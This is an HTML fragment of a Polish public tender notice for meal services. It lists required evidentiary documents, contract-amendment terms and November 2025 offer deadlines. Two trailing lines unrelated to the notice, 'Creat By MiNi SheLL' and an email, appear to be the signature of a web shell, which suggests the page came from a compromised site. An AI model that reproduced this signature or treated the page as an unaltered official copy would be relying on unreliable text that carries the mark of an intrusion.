sprawie <br/>spłat tych należności. <br/>c) zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej Zakładu <br/>Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki Kasy <br/>Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega <br/>z opłacaniem składek na ubezpieczenie społeczne i zdrowotne, w zakresie art. 109 ust.1 pkt 1 <br/>ustawy, wystawionego nie wcześniej niż 3 miesiące przez jego złożeniem, a w przypadku zalegania <br/>z opłacaniem składek na ubezpieczenie społeczne lub zdrowotne wraz z zaświadczeniem albo <br/>innym dokumentem zamawiający żąda złożenia dokumentów, że odpowiednio przed upływem <br/>terminu składania ofert wykonawca dokonał płatności należnych podatków lub opłat wraz <br/>z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. W celu potwierdzenia spełniania warunków udziału w postępowaniu <br/>a) dokument (np. polisa) potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności <br/>cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę <br/>gwarancyjną wskazaną przez zamawiającego, <br/>b) wykazu usług wykonanych nie wcześniej niż w okresie trzech lat, a jeżeli okres prowadzenia <br/>działalności jest krótszy- w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca <br/>wykonania oraz podmiotów, na rzecz których te usługi były wykonane, oraz załączeniem dowodów <br/>określających, czy te usługi były wykonane należycie, przy czym są to referencje bądź inne <br/>dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli <br/>wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów- inne <br/>odpowiednie dokumenty – na potwierdzenie spełniania przez wykonawcę warunku udziału <br/>w postępowaniu, o którym mowa w Rozdziale XVI ust. 2 SWZ. Wzór wykazu wykonanych usług <br/>stanowi załącznik nr 9 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1) wypełniony formularz oferty – załącznik nr 1 <br/>2) szczegółową kalkulację wsadu do kotła i przygotowania posiłku – zgodnie z załącznikiem nr 2A <br/>do SWZ, <br/>2) wypełnione oświadczenia Wykonawców o niepodleganiu wykluczeniu oraz spełnianiu <br/>warunków udziału w postępowaniu– zgodnie z załącznikiem nr 3 i 4 do SWZ; w przypadku <br/>wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie o niepodleganiu <br/>wykluczeniu oraz spełnianiu warunków udziału w postępowaniu składa każdy z wykonawców. W <br/>przypadku polegania na zdolnościach lub w sytuacji podmiotów udostępniających zasoby, <br/>wykonawca dołącza do oferty także oświadczenie podmiotu udostępniającego zasoby, <br/>potwierdzające brak podstaw do wykluczenia tego podmiotu oraz spełnianie warunków działu w <br/>postępowaniu, w zakresie, w jakim wykonawca powołuj się na jego zasoby, <br/>3)wypełnione oświadczenie - dotyczące przesłanek wykluczenia z art. 5k ROZPORZĄDZENIA <br/>833/2014 ORAZ ART. 7 UST. 1 USTAWY o SZCZEGÓLNYCH ROZWIĄZANIACH W ZAKRESIE <br/>PRZECIWDZIAŁANIA WSPIERANIU AGRESJI NA UKRAINĘ ORAZ SŁUŻĄCYCH OCHRONIE <br/>BEZPIECZEŃSTWA NARODOWEGO - Wykonawca/ Wykonawcy wspólnie ubiegający się <br/>o zamówienie, podmiotu udostępniającego zasoby - załącznik nr 8 do SWZ; <br/>4)zobowiązanie podmiotu udostępniającego zasoby lub inny podmiotowy środek dowodowy, <br/>o którym mowa w Rozdziale XVII ust. 4 SWZ – złożone np. według załącznika nr 5 do SWZ (jeżeli <br/>dotyczy); <br/>5)pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania <br/>wykonawcy – jeśli umocowanie nie wynika z dokumentów rejestrowych, <br/>6)pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania <br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego - jeśli umocowanie <br/>nie wynika z dokumentów rejestrowych (jeśli dotyczy), <br/>7)pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania <br/>podmiotu udostępniającego zasoby na zasadach określonych w art. 118 ustawy Pzp – jeśli <br/>umocowanie nie wynika z dokumentów rejestrowych (jeśli dotyczy), <br/>8) Oświadczenie RODO - załącznik nr 7 do SWZ. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie <br/>niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny i kadrowy oraz łączne <br/>kwalifikacje i doświadczenie. <br/>3.Wykonawca polegający na zasobach innych podmiotów: <br/>1) Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu polegać <br/>na zdolnościach technicznych lub zawodowych podmiotów udostępniających zasoby, <br/>niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych. <br/>2) <br/>W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych <br/>lub doświadczenia, wykonawcy mogą polegać na zdolnościach podmiotów udostępniających <br/>zasoby, jeśli podmioty te wykonają roboty budowlane do realizacji których te zdolności <br/>są wymagane. <br/>pozostała treść w SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający na podstawie art. 455 ust. 1 ustawy Prawo zamówień publicznych przewiduje możliwość zmiany zawartej Umowy w następujących przypadkach:<br/>1)	zmiana danych Wykonawcy lub Zamawiającego bez zmiany samych stron umowy (zmiana siedziby, adresu, nazwy, numeru rachunku bankowego, osób reprezentujących strony umowy) w przypadku zaistnienia wymienionych wyżej zmian po stronie stron umowy;<br/>2)	obniżenie wynagrodzenia Wykonawcy w przypadku obniżenia przez Wykonawcę ceny jednostkowej osobodnia poprzez złożenie Zamawiającemu pisemnego oświadczenia/wniosku z proponowaną zmianą wynagrodzenia. Zmiana wynagrodzenia w takim wypadku nie zmienia zakresu świadczenia przedmiotu umowy przez Wykonawcę;<br/>3)	w stosunku do wartości umowy - w razie zmiany urzędowej stawki podatku VAT - w celu dostosowania do aktualnie obowiązującej stawki - bez zmiany wartości netto wynagrodzenia wynikającego z Umowy, jednak nie wcześniej niż po dacie rozpoczęcia jej obowiązywania. Nowa stawka VAT obowiązuje od dnia jej wprowadzenia zgodnie z powszechnie obowiązującymi przepisami prawa. Zmiana Umowy w tym zakresie może być wprowadzona na wniosek każdej ze Stron;<br/>4)	w zakresie zmiany terminu wykonania przedmiotu umowy w przypadku wystąpienia nadzwyczajnych okoliczności niezależnych od Stron, stanowiących obiektywną przeszkodę w wykonaniu przedmiotu umowy <br/>w terminie wskazanym w Umowie - wyłącznie o okres trwania przeszkody,<br/>5)	w zakresie ograniczenia czy wstrzymania zakresu dostaw lub zmiany terminu usług lub terminu realizacji Umowy w przypadku ograniczenia liczby odbiorców posiłków lub wstrzymania lub ograniczenia usług związanych <br/>z zapobieganiem, przeciwdziałaniem i zwalczaniem COVID-19 <br/>i obowiązującymi w tym zakresie przepisami prawa.<br/>2.	Wszelkie zmiany do niniejszej Umowy wymagają zgody Zamawiającego oraz pod rygorem nieważności zachowania formy pisemnej w postaci aneksu i będą dopuszczalne w granicach unormowania art. 454 - 455 Ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-11-18 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-11-18 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-12-17</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com